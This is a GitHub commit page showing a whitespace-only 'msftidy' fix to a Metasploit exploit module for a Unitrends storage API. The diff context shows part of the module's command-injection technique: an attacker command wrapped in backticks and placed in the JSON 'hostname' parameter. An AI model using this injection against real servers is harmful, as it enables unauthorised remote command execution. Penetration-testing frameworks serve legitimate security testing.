Skip to content

Commit c26779e

Browse files
authored
fixed msftidy issues
1 parent 8f622a5 commit c26779e

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/linux/http/ueb9_api_storage.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -68,8 +68,8 @@ def execute_command(cmd, opts = {})
6868

6969
#substitue the cmd into the hostname parameter
7070
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
71-
parms << filter_bad_chars(cmd)
72-
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
71+
parms << filter_bad_chars(cmd)
72+
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
7373

7474

7575
res = send_request_cgi({

0 commit comments

Comments
 (0)